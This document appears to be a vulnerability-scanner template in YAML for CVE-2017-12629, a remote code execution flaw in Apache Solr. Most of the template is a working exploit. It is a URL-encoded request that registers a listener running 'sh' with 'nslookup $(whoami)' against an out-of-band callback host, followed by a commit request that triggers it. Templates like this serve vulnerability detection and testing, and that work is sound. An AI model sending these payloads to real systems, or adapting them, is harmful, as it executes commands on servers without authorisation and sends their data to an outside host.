26 lines
1.0 KiB
YAML
26 lines
1.0 KiB
YAML
id: CVE-2017-12629
|
|
|
|
info:
|
|
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
|
|
author: dwisiswant0
|
|
severity: critical
|
|
tags: cve,cve2017,solr,apache,rce,ssrf,oob
|
|
reference: |
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
|
- https://twitter.com/honoki/status/1298636315613974532/photo/1
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns" |